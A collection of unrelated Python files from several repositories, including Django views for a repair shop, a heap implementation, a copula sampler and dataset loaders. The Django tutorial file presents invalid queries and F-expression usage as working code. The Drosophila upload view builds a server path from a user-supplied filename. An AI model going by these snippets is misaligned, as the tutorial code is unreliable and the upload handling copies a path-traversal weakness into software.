def add_nota_reparacion(request, id_pres):
if request.method == "POST":
f_notas = NotasReparacionForm(request.POST)
if f_notas.is_valid():
notas = f_notas.save(commit=False)
notas.usuario_id = request.user.pk
notas.presupuesto_id = id_pres
presupuesto = Presupuesto.objects.get(pk=id_pres)
notas.save()
return redirect("reparacion", id_producto=presupuesto.producto.pk)
@login_required(login_url='login_tk')
def rm_nota_reparacion(request, id_nota, id_producto):
try:
NotasReparacion.objects.filter(pk=id_nota).delete()
except Exception as e:
pass
return redirect("reparacion", id_producto=id_producto)
@login_required(login_url='login_tk')
def actuaciones(request, id_actuacion=-1):
if not request.method == "POST" and id_actuacion == -1:
f_actuacion = ActuacionesForm()
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": Reparaciones.objects.all(),
"mensaje": "Actuacion nueva"})
elif not request.method == "POST" and id_actuacion > 0:
f_actuacion = ActuacionesForm()
try:
actuacion = Reparaciones.objects.get(pk=id_actuacion)
f_actuacion = ActuacionesForm(instance=actuacion)
except:
pass
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": Reparaciones.objects.all(),
"mensaje": "Editar actuacion"})
elif id_actuacion > 0:
try:
actuacion = Reparaciones.objects.get(pk=id_actuacion)
f_actuacion = ActuacionesForm( request.POST, instance=actuacion)
if f_actuacion.is_valid():
f_actuacion.save()
f_actuacion = ActuacionesForm()
except:
pass
return redirect("actuaciones")
else:
f_actuacion = ActuacionesForm(request.POST)
if f_actuacion.is_valid():
f_actuacion.save()
f_actuacion = ActuacionesForm()
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": Reparaciones.objects.all(),
"mensaje": "Actuacion nueva"})
@login_required(login_url='login_tk')
def rm_actuacion(request, id_actuacion):
try:
Reparaciones.objects.get(pk=id_actuacion).delete()
except:
pass
return redirect("actuaciones")
@login_required(login_url='login_tk')
def find_actuacion_taller(request):
codigo = request.POST['codigo']
datos = Reparaciones.objects.filter(Q(detalle__contains=codigo) |
Q(codigo__contains=codigo))
f_actuacion = ActuacionesForm()
return render(request, "taller/actuaciones.html",
{"form": f_actuacion,
"actuaciones": datos})
@login_required(login_url='login_tk')
def set_reparado(request, id_producto, estado='OK'):
pres = Presupuesto.objects.filter(producto__pk=id_producto)
if len(pres) > 0:
pres = pres[0]
cliente = pres.cliente
producto = Productos.objects.get(pk=id_producto)
producto.estado = "OK"
producto.save()
#Guardamos el historial de la accion
save_historial(request.user.pk, cliente.pk,
id_producto, "Producto reparado...")
threading.Thread(target=send_men_rep, args=(cliente, estado,)).start()
return redirect("lista_productos", estado='RP')
@login_required(login_url='login_tk')
def reparacion(request, id_producto):
try:
pres = Presupuesto.objects.filter(producto__pk=id_producto)
cliente = Clientes()
if len(pres) > 0:
pres = pres[0]
cliente = pres.cliente
except:
pres = Presupuesto()
form_notas = NotasReparacionForm()
return render (request, "taller/hoja_reparacion.html",
{"c": cliente,
"p": pres,
"notas": NotasReparacion.objects.filter(presupuesto_id=pres.pk),
"form_notas": form_notas})
@login_required(login_url='login_tk')
def save_actuacion(request):
if request.method == "POST":
try:
actuacion = Reparaciones.objects.get(codigo=request.POST.get("codigo"))
except:
actuacion = Reparaciones()
actuacion.codigo=request.POST["codigo"]
actuacion.detalle=request.POST["detalle"]
actuacion.precio=request.POST["precio"].replace(",",".")
actuacion.save()
datos = {
"result": True,
"pk": actuacion.pk,
"codigo": actuacion.codigo,
"can": 1,
"descuento": 0,
"detalle": actuacion.detalle,
"precio": actuacion.precio,
}
return JsonResponse(datos)
return JsonError("Solo puede ser peticiones POST")
@login_required(login_url='login_tk')
def tipo_testeo(request, id_tipo=-1):
if not request.method == "POST" and id_tipo == -1:
f_tipo = TipoTesteoForm()
return render(request, "taller/tipo_testeo.html",
{"form": f_tipo,
"tipos": ListaTesteo.objects.all(),
"mensaje": "Tipo nuevo"})
elif not request.method == "POST" and id_tipo > 0:
f_tipo = TipoTesteoForm()
try:
catergoria = ListaTesteo.objects.get(pk=id_tipo)
f_tipo = TipoTesteoForm(instance=catergoria)
except:
pass
return render(request, "taller/tipo_testeo.html",
{"form": f_tipo,
"tipos": ListaTesteo.objects.all(),
"mensaje": "Editar tipo"})
elif id_tipo > 0:
try:
catergoria = ListaTesteo.objects.get(pk=id_tipo)
f_tipo = TipoTesteoForm( request.POST, instance=catergoria)
if f_tipo.is_valid():
f_tipo.save()
except:
pass
return redirect("tipo_testeo")
else:
f_tipo = TipoTesteoForm(request.POST)
if f_tipo.is_valid():
f_tipo.save()
return redirect("tipo_testeo")
@login_required(login_url='login_tk')
def rm_tipo_testeo(request, id_tipo):
try:
ListaTesteo.objects.get(pk=id_tipo).delete()
except:
pass
return redirect("tipo_testeo")
@login_required(login_url='login_tk')
def testeo(request, id_producto):
producto = Productos.objects.get(pk=id_producto)
return render(request, "taller/testeo.html",{
"p": producto,
"ListaTesteo": ListaTesteo.objects.filter(categoria=producto.modelo.categoria),
"estado_test": ESTADO_CHOICES_TESTEO,
"form": FinTesteoForm(instance=producto)
})
@login_required(login_url='login_tk')
def set_estado_testeo(request, test_id, p_id, estado):
testeos = Testeo.objects.filter(Q(descripcion__pk=test_id) &
Q(producto__pk=p_id))
if len(testeos) > 0:
test = testeos[0]
else:
test = Testeo()
test.producto_id = p_id
test.estado = estado
test.descripcion_id = test_id
test.save()
return HttpResponse("success")
@login_required(login_url='login_tk')
def finalizar_testeo(request):
if request.method == "POST":
p_id = request.POST["p_id"]
producto = Productos.objects.get(pk=p_id)
f_p = FinTesteoForm(request.POST, instance=producto)
if f_p.is_valid():
p = f_p.save()
p.estado = "TD"
p.save()
h = Historial()
clientes = Historial.objects.filter(producto_id=p.pk)
cliente_id = 1
if len(clientes) > 0:
cliente_id = clientes[0].cliente_id
h.producto_id = p.id
h.usuario_id = request.user.id
h.cliente_id = cliente_id
h.detalle = "Finalización del testeo y valoración del producto"
h.save()
return redirect("lista_productos", estado="OS")
@login_required(login_url='login_tk')
def volver_testear_producto(request, id_producto):
p = Productos.objects.get(pk=id_producto)
p.estado = "OS"
p.save()
return redirect("tienda")
|
|
|
|
|
|
def cmb(n,r):
r = min(n-r,r)
if r == 0:
return 1
over = reduce(mul, range(n, n - r, -1),True)
under = reduce(mul, range(1,r + 1),True)
return over // under
|
|
fmridenoise/utils/traits.py
|
brain-net-cog/fMRIDenoise
|
|
|
import typing as t
from traits.trait_types import Union, TraitType, Instance
from traits.trait_base import _Undefined, Undefined
def Optional(trait: TraitType) -> Union:
"""
Return Union of function argument and Instance(_Undefined)
Args:
trait (TraitType): optional trait
Returns:
union with undefined instance
"""
return Union(trait, Instance(_Undefined))
def remove_undefined(iterable: t.Iterable) -> t.Iterable:
"""
Creates generator that ignores all instances of _Undefined
Args:
iterable (Iterable): objects iterable
Returns:
generator
"""
return (element for element in iterable if element is not Undefined)
|
|
aligned/HorizontalMaxPool2D.py
|
LT1st/ReID_Alined_beginer
|
|
|
import torch.nn as nn
class HorizontalMaxPool2d(nn.Module):
def __init__(self):
super(HorizontalMaxPool2d, self).__init__()
def forward(self, x):
inp_size = x.size()
return nn.functional.max_pool2d(input=x,kernel_size= (1, inp_size[3]))
|
|
02-django/04-queries-and-models/advanced-models.py
|
pjfreeze/platform-engineer-intermediate
|
|
|
## Field Choices
# Yesterday we created several models including the Book model which had a Char field "genre".
# While a free form "genre" field is great, it would be more helpful to specifically categorize
# books by genre, which would require a consistent set.
from django.db import models
from libs import fields as mm_fields
from libs.model_mixins import audit
# This should be really similar to what you ended up with yesterday for the book model based on the
# exercise. We are going to modify down below this one.
class BookOne(audit.CreationAuditMixin, audit.DeletionMixin):
_format = u'{} - title: {}, author: {}, genre: {}'
id = mm_fields.BigAutoField(primary_key=True)
title = models.CharField(max_length=mm_fields.LONG_CHAR_LEN)
author = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN)
# The CharField has a couple arguments we can add to let us restrict the options available
genre = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN)
def __unicode__(self):
return self._format.format(
self.id,
self.title,
self.author,
self.genre,
)
# We can make a generic class that has all of the choices we want by creating properties
# for each one and then a list of all properties that includes all of them, the name choices is not
# important, but whatever we call the collection is what must be referenced down below in the
# BookTwo model.
class Genres(object):
MYSTERY = 'mystery'
SCIENCE = 'science'
HISTORY = 'history'
HUMOR = 'humor'
options = (
(MYSTERY, 'Mystery'),
(SCIENCE, 'Science'),
(HISTORY, 'History'),
(HUMOR, 'Humor'),
)
# Here we have updated the book model's genre field to include some new things that use the Genres
# class we created above. Within Django's admin screen, this will appear as a select drop down.
class BookTwo(audit.CreationAuditMixin, audit.DeletionMixin):
_format = u'{} - title: {}, author: {}, genre: {}'
id = mm_fields.BigAutoField(primary_key=True)
title = models.CharField(max_length=mm_fields.LONG_CHAR_LEN)
author = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN)
# We can add a "choices" keyword and reference the choices list on the Genres class
# This will limit the options a book can use to the list from above
genre = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN, choices=Genres.options)
def __unicode__(self):
return self._format.format(
self.id,
self.title,
self.author,
self.genre,
)
## ContentTypes
# Yesterday we talked about Foreign Keys and the forward and reverse relationship they create
# between 2 models. Usually 1 model includes a foreign key to the other, which works for many cases.
# For more generic types of content such as tags, comments, or likes, it is unnecessary to create
# a unique model for each "type" of relationship. For example the difference between "liking" an
# organization versus a context is just which model it references.
# Django provides us the contenttypes framework to help us solve problems that situations like the
# above can create. Django's contenttypes framework let's us create models with 3 attributes, two
# are more standard fields, one is a placeholder that ends up housing the content we are after.
# Below is an example of how we would use that framework.
class GenericModelOne(models.Model):
# By default we can use a content_type field which can use a normal BigForeignKey to that table which
# has a row created for every model in the whole group of apps.
content_type = mm_fields.BigForeignKey('django.contenttype')
# we can include a BigIntegerField which holds the same information a Foreign Key does,
# (the ID or primary key to the other table), not a foreign key because it is not a specific
# type of object
object_id = models.BigIntegerField()
# You can see we have 1 reference to the type of content and another to the id of the content.
# Together we know what kind and which one of a content type to go get.
# Although we do not currently support serializing the last field (content_object), Django allows
# you to carry that object on the model.
# A model with all of the content types fields looks like this:
class GenericModelTwo(models.Model):
content_type = mm_fields.BigForeignKey('django.contenttypes')
object_id = models.BigIntegerField()
content_object = generic.GenericForeignKey()
## Q Objects
# The Q object gives us access to more powerful query sets. We can create more powerful conditions
# based and/or. For instance, we could search for a book with that matches the "mystery" genre or
# is by a specific author.
from django.db import Q, F
Books.objects.filter(
# Here we are checking for books with the author of me or the title that matches that below.
Q(author="<NAME>") | Q(title="Funny Things I Say")
)
Books.objects.filter(
author__icontains="pet",
author__icontains="eze",
)
# We could do a more complex match based on the inclusion of two things
Books.objects.filter(
# We can make sure the author field now contains more than one specific thing
Q(author__icontains="pet") & (Q(author__icontains="eze") | Q(title="Funny Things I Say")),
genre="History",
)
# There are some pretty complex queries using the Q object in the "ContestSummaryFilterBackend" in
# the election view sets.
## F Objects
# F objects let us manipulate the current object based on a current property without having to
# retrieve the value from the database.
# If we have a group of articles, we can assign the first one to be featured only if it has been
# published, without having to go and get the item first. The only thing this set of statements does
# is assignment, rather than retrieval.
article = Article.objects.filter(published=True).first()
article.featured = F('published')
article.save()
# As the documentation notes, the current instance of this article will not reflect the updated
# value because it never retrieved the updated version. Everything was telling the database what
# to do rather than bringing it back into your shell or script.
# Here we have an updated version that would reflect the new value for featured
article = Article.objects.get(pk=article.id)
# Another way you can use the F Object is to combine the above statements. On the group of objects,
# we have selected the first one, and updated it to use the value of the current objects published
# value for the featured.
Article.objects
.first()
.update(
featured=F('published')
)
# We could also have created a slug in a statement that wouldn't even need a iterative loop by using
# a similar syntax:
Article.objects.all()
.update(
slug=F('title').slugify()
)
|
|
|
|
|
|
#!/usr/bin/env python3
def median(data):
"""Finding the median from a list"""
# 1. Sort the list
new_data = sorted(data)
if len(new_data) == 1:
print(new_data[0])
return new_data[0]
else:
# Odd
if len(new_data) % 2 == 1:
mid_value = len(new_data) // 2
print(new_data[mid_value])
return new_data[mid_value]
# Even
elif len(new_data) % 2 == 0:
mid_value = len(data) // 2
median_val = (new_data[mid_value] + new_data[mid_value - 1]) / 2.0
print(median_val)
return median_val
median([10, 5, 3, 7, 8, 23])
|
|
Drosophila/admin_views.py
|
|
|
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from forms import *
from django.template import loader,RequestContext
from django.contrib.admin.views.decorators import staff_member_required
##########################
from models import *
from os import system
##############################################
########Thoughts for implementation##########
#Current state of update########
# Try to add information about assembly. And make it auto updatable
def saveData(uploadedFileName):
uploadedfile = str(uploadedFileName)
# saving input file content
destination = open('/home/DATA/Anmol/DARNED/uploadedFiles/Dmel/%s'%(uploadedfile),'wb+')
for chunk in uploadedFileName.chunks():
destination.write(chunk)
destination.close()
def dataCheck(flname):
infile = open("/home/DATA/Anmol/DARNED/uploadedFiles/Dmel/%s"%(flname))
for line in infile:
data = line[:-1].split('\t')
main = Main.objects.filter(chrom=data[0],coordinate=int(data[1]),strand=data[2])
if len(main) != 0:
pbd = main.filter(pubid__pubid=data[7])
if len(pbd) == 0:
try:
pbdx = PubId.objects.get(pubid=data[7])
except:
pbdx = PubId.objects.create(pubid = data[7],author= data[8],year=int(data[9]))
main.pubid.add(pbdx)
else:
main = Main.objects.create(chrom=data[0],coordinate=int(data[1]),strand=data[2], dnanuc="A",rnanuc="I",seqtype = data[4])
if data[3] != '-':
if data[4] == 'E':
main.exotype = data[5]
try:
gene = Gene.objects.get(gene=data[3])
except:
gene = Gene.objects.create(gene=data[3],ncbi='-')
main.gene = gene
if data[6] != '-':
main.alu = data[6]
try:
pbd = PubId.objects.get(pubid=data[7])
except:
pbd = PubId.objects.create(pubid = data[7],author = data[8],year=int(data[9]))
main.pubid.add(pbd)
main.save()
infile.close()
def upload_file(request):
if request.method == 'POST':
form = UploadFileForm(request.POST,request.FILES)
if form.is_valid():
filename = request.FILES['infile']
flname = str(filename)
saveData(request.FILES['infile'])
dataCheck(flname)
#return HttpResponseRedirect('/success/url/')# Write about successful file upload and logs on page.redirect link using a midddle file. put that file in temp folder
else:
form = UploadFileForm()
toform = {
'form':form,
'action':'/du/'
}
tmplt = loader.get_template('admin/uploadfile.html')
return HttpResponse(tmplt.render(RequestContext(request,toform)))
# return render_to_response('/home/manu/Desktop/DARNED/templates/admin/uploadfile.html',{'form':form})
upload_file = staff_member_required(upload_file)# This is make function acceible only to administers
|
|
resposta_atividade-sem-04-T2/03pt2.py
|
MacgayverPeixoto/PEC_IFPI_186
|
|
|
#03pt2
preco=float(input())
valor=float(input())
valor_percen= preco * valor/100
aumento_percen = preco + valor_percen
desconto_percen = preco - valor_percen
print(f'{aumento_percen:.2f}')
print(f'{desconto_percen:.2f}')
|
|
FeatureCollection/select_by_attributes.py
|
monocilindro/qgis-earthengine-examples
|
|
|
# GitHub URL: https://github.com/giswqs/qgis-earthengine-examples/tree/master/FeatureCollection/select_by_attributes.py
#!/usr/bin/env python
"""Select by attributes
"""
import ee
from ee_plugin import Map
# Select North Dakota and South Dakota
fc = ee.FeatureCollection('TIGER/2018/States') \
.filter(ee.Filter.Or(
ee.Filter.eq('STUSPS', 'ND'),
ee.Filter.eq('STUSPS', 'SD'),
))
image = ee.Image().paint(fc, 0, 2)
# Map.setCenter(-99.844, 37.649, 5)
Map.centerObject(fc, 6)
Map.addLayer(image, {'palette': 'FF0000'}, 'TIGER/2018/States')
|
|
RestFramework 1/api/views.py
|
|
|
|
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from hub.models import Project
from .serializers import ProjectSerializer
def projects_List(request):
"""List all projects
Arguments:
request {HttpRequest} --
"""
if request.method == 'GET':
projects = Project.objects.all()
serializer = ProjectSerializer(projects, many=True)
return JsonResponse(serializer.data, safe=False)
|
|
kpi/visiting_management/urls.py
|
UniversitaDellaCalabria/kpiManagement
|
|
|
from django.urls import path
from . datatables import *
from . views import *
app_name = 'visiting'
# app prefix
prefix = 'visiting'
urlpatterns = [
path(f'{prefix}/', dashboard, name='dashboard'),
# datatables
path(f'{prefix}/<str:structure_slug>/visitings.json',
datatables_structure_visitings, name='structure_visitings_json'),
path(f'{prefix}/<str:structure_slug>/',
structure_visitings, name='structure_visitings'),
path(f'{prefix}/<str:structure_slug>/new/',
new_structure_visiting, name='new_structure_visiting'),
path(f'{prefix}/<str:structure_slug>/<str:visiting_pk>/',
structure_visiting, name='structure_visiting'),
path(f'{prefix}/<str:structure_slug>/<str:visiting_pk>/edit/',
edit_structure_visiting, name='edit_structure_visiting'),
]
|
|
|
anhtumai/data-structure-and-algorithms-collection
|
|
|
"""
Heap is a binary tree-based data structure, can be implemented using a list.
There are 2 types of heaps:
- Max-Heap: The key representing the root must be greatest among the keys which present
at all of its children. The same rule applies for all the subtrees.
- Min-Heap: The key representing the root must be smallest among the keys which present
at all of its children. The same rule applies for all the subtrees.
Heap Public method:
- size() -> int: return the number of elements
- is_empty() -> bool: check if the heap is empty
- peek() -> any: return the root value of the heap
- poll() -> any: remove and return the root value of the heap.
The heap perform self-tuning after removal
- add() -> None: add new element to the heap
For Min Heap only:
- decrease_key(name: any, new_distance: Union[int | float]) -> None:
Find the node with the given name, update its distance to
lesser value (new_distance)
( This function is created specifically for graph finding algorithms,
since we need to update the weight of a path when we find the shorter path.
This function assumes that Node datatype has 'name' and 'distance' property)
"""
from typing import Union
class Heap:
def __init__(self, elems: list[any] = []):
self.elems: list[any] = []
for elem in elems:
self.add(elem)
def _has_left(self, index: int) -> bool:
return index * 2 + 1 < len(self.elems)
def _has_right(self, index: int) -> bool:
return index * 2 + 2 < len(self.elems)
def _has_parent(self, index: int) -> bool:
return index != 0
def _get_parent_index(self, index: int) -> int:
return int((index - 1) / 2)
def _get_left_index(self, index: int) -> int:
return index * 2 + 1
def _get_right_index(self, index: int) -> int:
return index * 2 + 2
def _get_value(self, index: int) -> any:
return self.elems[index]
def _get_left(self, index: int) -> any:
return self._get_value(self._get_left_index(index))
def _get_right(self, index: int) -> any:
return self._get_value(self._get_right_index(index))
def _get_parent(self, index: int) -> any:
return self._get_value(self._get_parent_index(index))
def _heapify_up(self, start: int) -> None:
raise NotImplementedError
def _heapify_down(self, start: int = 0) -> None:
raise NotImplementedError
def size(self) -> int:
return len(self.elems)
def is_empty(self):
return len(self.elems) == 0
def peek(self) -> any:
"""Return the root element of the heap"""
if len(self.elems) == 0:
raise RuntimeError("Heap is empty")
return self.elems[0]
def poll(self) -> any:
"""Return and remove the current root element in the min heap"""
if len(self.elems) == 0:
raise RuntimeError("Heap is empty")
res = self.elems[0]
self.elems[0] = self.elems[-1]
del self.elems[-1]
self._heapify_down()
return res
def add(self, item) -> None:
"""Add new element to the heap and perform self-tuning"""
self.elems.append(item)
self._heapify_up(len(self.elems) - 1)
def __str__(self):
return str(self.elems)
class MinHeap(Heap):
def _heapify_up(self, start: int) -> None:
index = start
while (
self._has_parent(index)
and self._get_value(self._get_parent_index(index)) > self.elems[index]
):
parent_index = self._get_parent_index(index)
self.elems[parent_index], self.elems[index] = (
self.elems[index],
self.elems[parent_index],
)
index = self._get_parent_index(index)
def _heapify_down(self, start: int = 0) -> None:
index = start
while self._has_left(index):
smaller_child_index = self._get_left_index(index)
if self._has_right(index) and self._get_right(index) < self._get_left(
index
):
smaller_child_index = self._get_right_index(index)
if self.elems[index] < self.elems[smaller_child_index]:
return
self.elems[index], self.elems[smaller_child_index] = (
self.elems[smaller_child_index],
self.elems[index],
)
index = smaller_child_index
def decrease_key(self, name: any, new_distance: Union[int, float]) -> None:
"""Find the node with the given name, decrease its distance to new_distance.
Args:
name: name of replaced node
new_distance: new distance of updated node
Assumptions:
Elements in heap tree must have name and distance property
"""
for i in range(len(self.elems)):
if self.elems[i].name == name:
assert (
new_distance < self.elems[i].distance
), "new distance should be lesser than current distance"
self.elems[i].distance = new_distance
self._heapify_up(i)
return
class MaxHeap(Heap):
def _heapify_up(self, start: int) -> None:
index = start
while (
self._has_parent(index)
and self._get_value(self._get_parent_index(index)) < self.elems[index]
):
parent_index = self._get_parent_index(index)
self.elems[parent_index], self.elems[index] = (
self.elems[index],
self.elems[parent_index],
)
index = self._get_parent_index(index)
def _heapify_down(self, start: int = 0) -> None:
index = start
while self._has_left(index):
bigger_child_index = self._get_left_index(index)
if self._has_right(index) and self._get_right(index) > self._get_left(
index
):
bigger_child_index = self._get_right_index(index)
if self.elems[index] > self.elems[bigger_child_index]:
return
self.elems[index], self.elems[bigger_child_index] = (
self.elems[bigger_child_index],
self.elems[index],
)
index = bigger_child_index
|
|
|
PetropoulakisPanagiotis/copula
|
|
|
from __future__ import division
from itertools import combinations
from pandas import read_excel
import numpy as np
def birth(currentModel, u, dist, numbrk, q):
sample = len(u)
j = np.count_nonzero(currentModel == 0)
L = len(currentModel) - j
new = np.sort(currentModel)
k = np.random.randint(low=dist, high=sample - dist+1)
w = np.random.uniform(low=np.nextafter(0.0, 1.0))
if j < numbrk and not np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j))):
z = 1
kn = k
new[j - 1] = kn
bir = np.sort(new)
j2 = np.count_nonzero(new == 0)
d = (np.argwhere(bir == kn) + 1)[0][0]
t2 = currentModel[np.sort(currentModel) != 0]
if kn > np.max(t2):
Q = np.ones(numbrk + 1,dtype=int)
Q[:numbrk - j2 - 1] = q[:numbrk - j2 - 1]
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[numbrk - j2 - 1]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 1/3:
Q[numbrk - j2 - 1:numbrk - j2 + 1] = list(temp[row - 1])
else:
if a >= 1/3 and a < 2/3:
Q[numbrk - j2 - 1:numbrk - j2 + 1] = list(temp[row - 1])[::-1]
else:
if a >= 2/3:
Q[numbrk - j2 - 1:numbrk - j2 + 1] = np.ones(2,dtype=int) * q[numbrk - j2 - 1]
Q[d - j2+1:numbrk + 1] = Q[d - j2] * np.ones(numbrk - d + j2, dtype=int)
s = np.concatenate((np.asarray([q[numbrk - j2 - 1]]), np.asarray(Q[numbrk - j2 - 1:numbrk - j2 + 1])), axis=0)
else:
if kn < np.min(t2):
Q = np.zeros(numbrk + 1, dtype=int)
Q[2:numbrk + 1] = q[1:numbrk]
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[0]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 1/3:
Q[:2] = list(temp[row - 1])
else:
if a >= 1/3 and a < 2/3:
Q[:2] = list(temp[row - 1])[::-1]
else:
if a >= 2/3:
Q[:2] = np.ones(2,dtype=int) * q[0]
s = np.concatenate((np.asarray([q[0]]), Q[:2]), axis=0)
else:
Q = np.zeros(numbrk + 1,dtype=int)
Q[:d - j2 - 1]= q[:d - j2 - 1]
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[d - j2 - 1]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 1/3:
Q[d - j2 - 1:d - j2 + 1] = list(temp[row - 1])
else:
if a >= 1/3 and a < 2/3:
Q[d - j2 - 1:d - j2 + 1] = list(temp[row - 1])[::-1]
else:
if a >= 2/3:
Q[d - j2 - 1:d - j2 + 1] = np.ones(2,dtype=int) * q[d - j2 - 1]
Q[d - j2 + 1: numbrk + 1] = q[d - j2:numbrk]
s = np.concatenate((np.asarray([q[d - j2 - 1]]), Q[d - j2 - 1:d - j2 + 1]), axis=0)
elif j == numbrk and not np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j,1))):
Q = np.ones(numbrk + 1,dtype=int)
z = 1
kn = k
new[j - 1] = kn
bir = np.sort(new)
temp = [comb for comb in combinations([1, 2, 3], 2)]
j = 0
G = 0
while j < 3 and G == 0:
if np.all(temp[j] != np.ones(shape=(1,2)) * q[0]):
G = 1
del temp[j]
j += 1
a = np.random.uniform(low=np.nextafter(0.0, 1.0))
row = np.random.randint(low=1, high=3)
if a < 2/3:
d = np.random.uniform(low=np.nextafter(0.0, 1.0))
if d < 1/2:
Q[0] = temp[row - 1][0]
Q[1:numbrk + 1] = np.ones(numbrk,dtype=int) * temp[row - 1][1]
else:
Q[0] = temp[row - 1][1]
Q[1:numbrk + 1] = np.ones(numbrk,dtype=int) * temp[row - 1][0]
else:
Q = q
s = np.concatenate((np.asarray([q[0]]), Q[:2]), axis=0)
elif np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j,1))):
z = -3
bir = currentModel
kn = k
Q = q
s = 0
result = {"bir": bir, "kn": kn, "s": s, "Q": Q, "q": q, "z": z}
return result
if __name__ == "__main__":
df = read_excel("../data/artificial_data.xlsx", sheet_name='Sheet1')
u = []
for index, row in df.iterrows():
u.append([float(row['u'])])
u = np.asarray(u, dtype=np.float32)
dist = 30
numbrk = 5
currentModel = np.zeros(numbrk, dtype=np.uint32)
currentModel[numbrk - 1] = 50
q = np.ones(numbrk + 1, dtype=np.uint32)
result = birth(currentModel, u, dist, numbrk, q)
print(result)
|
|
|
|
|
|
from collections import Counter, defaultdict
import math
import numpy as np
import re
def avgstd(l): # Displays mean and variance
n = len(l)
# print 'computed over %d values' % n
mean = float(sum(l)) / n
var = float(sum(i * i for i in l)) / n - mean * mean
return '%.3f ± %.3f' % (round(mean, 3), round(1.96 * math.sqrt(var / (10 * n)), 3))
# return mean, round(1.96 * math.sqrt(var / n), 5)
def get_scores():
values = defaultdict(lambda: [])
logs = {}
with open('3-pdf-fisher') as f:
logs['fisher'] = f.read().splitlines()
with open('3-pdf-random') as f:
logs['random'] = f.read().splitlines()
with open('3-pdf-popular') as f:
logs['popular'] = f.read().splitlines()
r = re.compile('^([0-9]+) +([0-9]+) +([0-9]+) .*mobo=([0-9.]+), rmse=([0-9.]+),.*mobo=([0-9.]+), rmse=([0-9.]+),')
for model in logs.keys():
for line in logs[model]:
m = r.match(line)
if m:
user_id, _, t, train_mobo, train_rmse, test_mobo, test_rmse = m.groups()
t = int(t)
values[model, 'train_mobo', t].append(float(train_mobo))
values[model, 'train_rmse', t].append(float(train_rmse))
values[model, 'test_mobo', t].append(float(test_mobo))
values[model, 'test_rmse', t].append(float(test_rmse))
BUDGET = 10
for t in range(BUDGET):
for quantity in ['test_mobo', 'test_rmse']: # 'train_mobo', 'train_rmse',
for model in logs.keys():
print(t, quantity, model, avgstd(values[model, quantity, t]))
return values
|
|
|
|
|
|
import glob
import torch
from PIL import Image
from torch.utils.data import Dataset
from utils import download_and_extract
class CelebA(Dataset):
"""CelebA dataset."""
url="https://github.com/akanametov/dcgan-pytorch/releases/download/1.0/celeba.zip"
def __init__(self, root, download=False, transform=None):
if download:
_ = download_and_extract(root, self.url)
self.root=root
self.files=sorted(glob.glob(f"{root}/celeba/img_align_celeba/*.jpg"))
self.transform=transform
self.download=download
def __len__(self,):
return len(self.files)
def __getitem__(self, idx):
img = Image.open(self.files[idx]).convert('RGB')
if self.transform:
img = self.transform(img)
return img, torch.tensor([0]).long()
class LSUN(Dataset):
"""LSUN(bedroom) dataset."""
url="https://github.com/akanametov/dcgan-pytorch/releases/download/1.0/lsun.zip"
def __init__(self, root, download=False, transform=None):
if download:
_ = download_and_extract(root, self.url)
self.root=root
self.files=sorted(glob.glob(f"{root}/lsun/bedroom/0/*/*/*.jpg"))
self.transform=transform
self.download=download
def __len__(self,):
return len(self.files)
def __getitem__(self, idx):
img = Image.open(self.files[idx]).convert('RGB')
if self.transform:
img = self.transform(img)
return img, torch.tensor([0]).long()
|
|
sciencebeam_gym/structured_document/svg.py
|
elifesciences/sciencebeam-gym
|
|
|
from sciencebeam_utils.utils.xml import (
set_or_remove_attrib
)
from sciencebeam_gym.utils.bounding_box import (
BoundingBox
)
from sciencebeam_gym.structured_document import (
AbstractStructuredDocument,
get_scoped_attrib_name,
get_attrib_by_scope
)
SVG_NS = 'http://www.w3.org/2000/svg'
SVG_NS_PREFIX = '{' + SVG_NS + '}'
SVG_DOC = SVG_NS_PREFIX + 'svg'
SVG_TEXT = SVG_NS_PREFIX + 'text'
SVG_G = SVG_NS_PREFIX + 'g'
SVG_RECT = SVG_NS_PREFIX + 'rect'
SVG_VIEWBOX_ATTRIB = 'viewBox'
SVG_TAG_ATTRIB = 'class'
SVGE_NS = 'http://www.elifesciences.org/schema/svge'
SVGE_NS_PREFIX = '{' + SVGE_NS + '}'
SVGE_BOUNDING_BOX = SVGE_NS_PREFIX + 'bounding-box'
SCOPED_TAG_ATTRIB_SUFFIX = 'tag'
SVG_NSMAP = {
None: SVG_NS,
'svge': SVGE_NS
}
class SvgStyleClasses(object):
LINE = 'line'
BLOCK = 'block'
LINE_NO = 'line_no'
def format_bounding_box(bounding_box):
return '%s %s %s %s' % (bounding_box.x, bounding_box.y, bounding_box.width, bounding_box.height)
def parse_bounding_box(bounding_box_str):
if not bounding_box_str:
return None
x, y, width, height = bounding_box_str.split()
return BoundingBox(float(x), float(y), float(width), float(height))
def get_node_bounding_box(t):
attrib = t.attrib
if SVGE_BOUNDING_BOX in attrib:
return parse_bounding_box(attrib[SVGE_BOUNDING_BOX])
if SVG_VIEWBOX_ATTRIB in attrib:
return parse_bounding_box(attrib[SVG_VIEWBOX_ATTRIB])
